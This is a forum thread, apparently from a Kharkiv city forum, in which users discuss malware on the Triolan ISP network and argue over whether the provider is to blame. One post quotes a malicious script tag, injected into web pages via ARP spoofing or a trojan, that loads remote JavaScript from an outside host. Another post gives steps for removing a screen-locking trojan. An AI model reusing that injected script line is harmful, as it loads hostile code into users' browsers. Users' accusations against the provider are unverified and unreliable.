Змінюй хід війни! Допомагай ЗСУ!

Интернет провайдер ТРИОЛАН

🟢 17:23 Відбій тривоги в м. Харків та Харківська територіальна громада.Слідкуйте за подальшими повідомленнями.#м_Харків_та_Харківська_територіальна_громада
  • 🟢 17:23 Відбій тривоги в м. Харків та Харківська територіальна громада.Слідкуйте за подальшими повідомленнями.#м_Харків_та_Харківська_територіальна_громада
  • #121
  • 🟢 17:23 Відбій тривоги в м. Харків та Харківська територіальна громада.Слідкуйте за подальшими повідомленнями.#м_Харків_та_Харківська_територіальна_громада
  • #122
  • 🟢 17:23 Відбій тривоги в м. Харків та Харківська територіальна громада.Слідкуйте за подальшими повідомленнями.#м_Харків_та_Харківська_територіальна_громада
  • #123
563237955.png

Переглянути вкладення 13260091
Пакет за 60 гр.Доволен как слон.:yahoo:
 
  • 🟢 17:23 Відбій тривоги в м. Харків та Харківська територіальна громада.Слідкуйте за подальшими повідомленнями.#м_Харків_та_Харківська_територіальна_громада
  • #124
Хакер или вирус в сети Триолан - ворует пароли - будьте осторожны

Процесс следующий: подменяется ай-пи и мак-адрес шлюза провайдра. Трафик начинает идти через хакерский комп, в любой сайт который вы открываете встраивается скрипт:
Код:
<script src=https://v.nmbrx.com/1.js></script>

Что там дальше и как я не знаю, но таким образом у меня похитили пароль и в аську требовали деньги за возврат.
Теперь я использую NoScript под FireFox и программу ARP Defender.
И вам советую быть осторожными.

В тех поддержку Триолана и звонил, и писал, но воз и ныне там.
 
  • 🟢 17:23 Відбій тривоги в м. Харків та Харківська територіальна громада.Слідкуйте за подальшими повідомленнями.#м_Харків_та_Харківська_територіальна_громада
  • #125
админы сети левачат:D
 
  • 🟢 17:23 Відбій тривоги в м. Харків та Харківська територіальна громада.Слідкуйте за подальшими повідомленнями.#м_Харків_та_Харківська_територіальна_громада
  • #126
Да ху...я, скрипт:

код:
<script src=Посилання видалено></script>
левЫй!
 
  • 🟢 17:23 Відбій тривоги в м. Харків та Харківська територіальна громада.Слідкуйте за подальшими повідомленнями.#м_Харків_та_Харківська_територіальна_громада
  • #127
кто что-то приятное говорил про триолан? на триолане ТОЛЬКО хороший игровой сайт тим фортресса2 сделали, больше я ничего хорошего в триолане не вижу
 
  • 🟢 17:23 Відбій тривоги в м. Харків та Харківська територіальна громада.Слідкуйте за подальшими повідомленнями.#м_Харків_та_Харківська_територіальна_громада
  • #128
юзайте фаерволы и не ебите моск
 
  • 🟢 17:23 Відбій тривоги в м. Харків та Харківська територіальна громада.Слідкуйте за подальшими повідомленнями.#м_Харків_та_Харківська_територіальна_громада
  • #129
ТС унылый ламер, когда-то услышавший про полдмену ИП/МАКа и решивший, что это верх сетевых технологий. И как следствие начавший писать постную хуйню.
Описанная ситуация - стандартное поведение трояна, который встраивается на уровень LSP или TDI сетевого стека и добавляет вышеуказанный тег скрипта в траффик по 80-му порту.
Далее браузер грузит тело скрипта, которое чаще всего занимается подменой ссылок на страничке через ДОМ-модель для того, чтобы вы ходили на ППЦ-шки.

"... хакер ворует пароли..." - спасибо поржал.
 
  • 🟢 17:23 Відбій тривоги в м. Харків та Харківська територіальна громада.Слідкуйте за подальшими повідомленнями.#м_Харків_та_Харківська_територіальна_громада
  • #130
дооооо видать Триолан виноват что вы комп свой защитить нормально не можете, а пока в одной подсети с какими-то блондинками сидел запарилсо читать отчеты про атаки и арп-спуффы, получил внешник отчетов меньше стало и постоянно атаки с внешников мой новой подсетки =))))

Короче всем срочно ставить хотя бы антивирус и чекать компы avz
 
  • 🟢 17:23 Відбій тривоги в м. Харків та Харківська територіальна громада.Слідкуйте за подальшими повідомленнями.#м_Харків_та_Харківська_територіальна_громада
  • #131
Описанная ситуация - стандартное поведение трояна, который встраивается на уровень LSP или TDI сетевого стека и добавляет вышеуказанный тег скрипта в траффик по 80-му порту.

А потом троян шантажирует через аську ТС-а?
 
  • 🟢 17:23 Відбій тривоги в м. Харків та Харківська територіальна громада.Слідкуйте за подальшими повідомленнями.#м_Харків_та_Харківська_територіальна_громада
  • #132
spaceman

Ржунимагу! Песчы исчо. КГ/АМ, тема сисек не раскриты, великая китайская ждет тебя. :підстолом:
 
  • 🟢 17:23 Відбій тривоги в м. Харків та Харківська територіальна громада.Слідкуйте за подальшими повідомленнями.#м_Харків_та_Харківська_територіальна_громада
  • #133
Фаервол, который входит в комплект Касперского защиту не держит, Outpost не держит - скрипт проходит.
Если для того, чтобы пользоваться сетью Триолан надо быть "умником", то всем обычным людям лучше пользоваться другим провайдером.
Я то свой комп как раз защитил....

И поскольку посыпались непонятные мне оскорбления (что впрочем как обычно), тема закрывается...
 
  • 🟢 17:23 Відбій тривоги в м. Харків та Харківська територіальна громада.Слідкуйте за подальшими повідомленнями.#м_Харків_та_Харківська_територіальна_громада
  • #134
Триолан, развод на деньги

Попросил меня товарищ глянуть его комп. Говорит, что недавно полключился к Триолану, пришел представитель провайдера настраивать компьютер, все сделал, ушел. А после его ухода, через пару часов, на экране компа появилось сообщение: см. картинку внизу.
Перезагрузка компа результатов не даёт, после входа в систему эта картинка опять выскакивает.
Поковырявшись в системе обнаружил следующее: в автозагрузке запускается файлик cmon.exe, который и выдает это забавное сообщение, при этом работа компа блокируется. Файл удалил, автозагрузку почистил, сетевой кабель отключил. Перезагрузились - все работает хорошо, сообщение не выдается, комп не блокируется. Подсоединили сетевой кабель и сразу-же выскакивает это-же сообщение.
Вывод: троян лезет от провайдера по сети. Проверил настройки антивирусной программы и фаервола. Фаервол отключен, в антивируснике отключен сетевой экран. Спрашиваю у товарища: "Лазили сюда?" говорит "Нет, это в антивируснике клацал тот мужик, что приходил от провайдера подключать сеть".
Ну в общем такая картина: провайдер, или его админы, решили деньжат срубить и таким нехитрым способом промышляют, в надежде на то, что юзер не побежит жаловаться, если у него нелицензионная винда стоит.

ps/ А у товарища как-раз винда лицензионная стоит, тут они облажались:D

Как с этим бороться:
Отключаем сетевой кабель.
Перезагружаемся в защищенном режиме. Из папки с:\windows удаляем файл cmon.exe
Далее: Пуск-Выполнить. пишем msconfig Автозагрузка. снимаем галочку напротив cmon применить. Перезагружаемся
После перезагрузки переустанавливаем антивирусную программу и настраиваем фаервол.
Подключаем сетевой кабель и работаем:)
 

Вкладення

  • tr1.jpg
    tr1.jpg
    43.7 КБ · Перегляди: 286
  • 🟢 17:23 Відбій тривоги в м. Харків та Харківська територіальна громада.Слідкуйте за подальшими повідомленнями.#м_Харків_та_Харківська_територіальна_громада
  • #135
гг круто
 
  • 🟢 17:23 Відбій тривоги в м. Харків та Харківська територіальна громада.Слідкуйте за подальшими повідомленнями.#м_Харків_та_Харківська_територіальна_громада
  • #136
Морду набить таким представителям компании не помешало бы.
 
  • 🟢 17:23 Відбій тривоги в м. Харків та Харківська територіальна громада.Слідкуйте за подальшими повідомленнями.#м_Харків_та_Харківська_територіальна_громада
  • #137
ыыы..я ипу, телу этого червя уже лет 5 точно....:D кста современная его версия более агрессивная :D
ГГ...в тему: Посилання видалено
 
  • 🟢 17:23 Відбій тривоги в м. Харків та Харківська територіальна громада.Слідкуйте за подальшими повідомленнями.#м_Харків_та_Харківська_територіальна_громада
  • #138
Это не Триолан. Это червь типа Adware, который бродит уже давно
 
  • 🟢 17:23 Відбій тривоги в м. Харків та Харківська територіальна громада.Слідкуйте за подальшими повідомленнями.#м_Харків_та_Харківська_територіальна_громада
  • #139
Вот сволочь. Хорошо что я при подключении ихнего техника к компу не подпустил
 
  • 🟢 17:23 Відбій тривоги в м. Харків та Харківська територіальна громада.Слідкуйте за подальшими повідомленнями.#м_Харків_та_Харківська_територіальна_громада
  • #140
Техник в чем-то прав - на тачках иногда стоит все что только можно и провести первичную настройку практически невозможно не потушив все фаеры, антивирусники, блокираторы портов и прочую софтину которой народ защищается от всех и вся.
А сидеть пол дня и прописывать во всех этих прогах исключения и правила в его обязанности не входит и занимает море времени, а подключений у него за день не одно обычно и не два...
Раз такая софтина стоит то предполагается что юзер ею умеет пользоваться и сам пропишет все что ему нужно.

p.s. раз ты такой великий спец то как же ты не догодался что это не провайдер и не его представители подкинули трояна, а банально он приперся из сетки или из инета т.к. ip реальные раздают :)
 
Назад
Зверху Знизу